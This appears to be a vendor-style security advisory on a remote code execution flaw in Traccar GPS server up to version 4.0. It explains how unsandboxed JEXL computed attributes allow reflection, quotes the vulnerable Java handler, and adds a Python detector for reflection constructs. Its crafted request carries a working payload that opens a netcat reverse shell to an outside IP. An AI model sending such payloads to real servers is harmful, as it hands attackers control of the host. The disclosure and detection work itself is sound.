Advisory: Remote Code Execution Traccar Server <=4.0 (AC-2018-10-8-1)


Our security team discovered a Remote Code Execution (RCE) vulnerability in the GPS vehicle tracking system Traccar (version <= 4.0).  This allows an attacker to compromise the server’s host via a self-registered user account.

If you use Traccar server, please update to >= v4.1 as soon as possible.

Vulnerability Identification

Traccar

Traccar is a widely deployed open source GPS tracking system that supports over one thousand different devices and protocols. The server collects tracking data from the devices and exposes it through a web portal, where it is used for organisational services such as logistics and transport planning.

Timeline

Vulnerability Details

A feature of the application allows a self-registered user to create expressions (computed attributes) which normalise the output of their tracking devices in order to improve integration with the application.

One example is synthesising the engine state of a vehicle whose device does not report it, by inferring it from the device's battery charge state.

These expressions are interpreted by the third-party JexlEngine without any restriction on what they may access inside the Java Virtual Machine (JVM). As such, a crafted JEXL expression can reach arbitrary classes via reflection and allow an attacker to compromise the server.

Example Crafted Request

POST /traccar/api/attributes/computed/test?deviceId=1 HTTP/1.1
Host: foo.host.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Cookie: JSESSIONID=...; ext-devices-...

{"id":-1,"description":"test","type":"string","attribute":"raw",
"expression":"''.class.class.forName('java.lang.Runtime')
.getRuntime().exec('nc -nv 1.2.3.4 443 -e /bin/bash')"}

Vulnerable Code

// src/org/traccar/processing/ComputedAttributesHandler.java
package org.traccar.processing;
...
import org.apache.commons.jexl2.JexlEngine;
import org.apache.commons.jexl2.JexlException;
import org.apache.commons.jexl2.MapContext;
import org.traccar.BaseDataHandler;
import org.traccar.model.Attribute;
import org.traccar.model.Position;

@ChannelHandler.Sharable
public class ComputedAttributesHandler extends BaseDataHandler {

    private JexlEngine engine; // declaration elided from the original excerpt

    public ComputedAttributesHandler() {
        // The engine is built with the default uberspector and no sandbox, so an
        // expression can reach any class via reflection (''.class.class.forName(...)).
        // setStrict(true) only governs undefined variables, not access control.
        engine = new JexlEngine();
        engine.setStrict(true);
        ...
    }

    private MapContext prepareContext(Position position) {
        // Only Position data is meant to be visible to the expression.
        MapContext result = new MapContext();
        ...
        return result;
    }

    public Object computeAttribute(Attribute attribute, Position position) throws JexlException {
        // The user-supplied expression string is compiled and evaluated as-is.
        return engine.createExpression(attribute.getExpression()).evaluate(prepareContext(position));
    }
    ...
}
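As an added defensive example that is not part of the advisory or of Traccar's own code: a Python check that inspects requests to the computed-attribute endpoint shown above and flags expressions that use JVM reflection or process constructs rather than plain attribute arithmetic. The sample request bodies are constructed, the command in the reflection chain is a placeholder, and the function names are hypothetical.

```python
import json
import re
from typing import List, Optional

# Path fragment of the endpoint from the advisory's crafted request.
COMPUTED_ATTRIBUTE_PATH = "/api/attributes/computed"

# JEXL constructs that reach the JVM instead of the Position's attributes.
# A legitimate computed attribute combines device attributes with arithmetic,
# comparisons or ternaries; it has no reason to touch classes or processes.
SUSPICIOUS_CONSTRUCTS = [
    ("class literal access", re.compile(r"\.class\b")),
    ("Class.forName", re.compile(r"\bforName\s*\(")),
    ("Runtime.getRuntime", re.compile(r"\bgetRuntime\s*\(")),
    ("exec()", re.compile(r"\bexec\s*\(")),
    ("ProcessBuilder", re.compile(r"\bProcessBuilder\b")),
    ("JEXL new()", re.compile(r"\bnew\s*\(")),
    ("ClassLoader.loadClass", re.compile(r"\bloadClass\s*\(")),
    ("reflective invoke", re.compile(r"\b(getMethod|invoke)\s*\(")),
]


def classify_expression(expression: str) -> List[str]:
    """Return labels of every suspicious construct present in a JEXL expression."""
    return [label for label, pattern in SUSPICIOUS_CONSTRUCTS if pattern.search(expression)]


def inspect_request(method: str, path: str, body: str) -> Optional[dict]:
    """Inspect one HTTP request; return a finding for a suspicious computed-attribute
    expression, or None if the request is benign or unrelated. Covers both the
    /test (preview) form and the create/update form of the endpoint."""
    if method.upper() != "POST" or COMPUTED_ATTRIBUTE_PATH not in path.split("?", 1)[0]:
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return {"path": path, "reason": "malformed JSON body"}
    expression = payload.get("expression") if isinstance(payload, dict) else None
    if not isinstance(expression, str):
        return None
    hits = classify_expression(expression)
    return {"path": path, "expression": expression, "constructs": hits} if hits else None


# Constructed sample bodies: a legitimate battery/power rule, and a reflection chain
# in the shape of the advisory's request with the command replaced by a placeholder.
BENIGN_BODY = json.dumps({"id": -1, "description": "engine on", "type": "boolean",
                          "attribute": "ignition", "expression": "batteryLevel > 20 && power > 12.5"})
MALICIOUS_BODY = json.dumps({"id": -1, "description": "test", "type": "string", "attribute": "raw",
                             "expression": "''.class.class.forName('java.lang.Runtime')"
                                           ".getRuntime().exec('PLACEHOLDER_COMMAND')"})
```

Run over a proxy or access log that retains POST bodies, a non-empty `constructs` list on this endpoint is a strong indicator of an exploitation attempt against unpatched servers.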

PoC Exploitation

A proof-of-concept tool (traccar_exploit.v1.py) was written to exploit this vulnerability and is demonstrated in this video.

References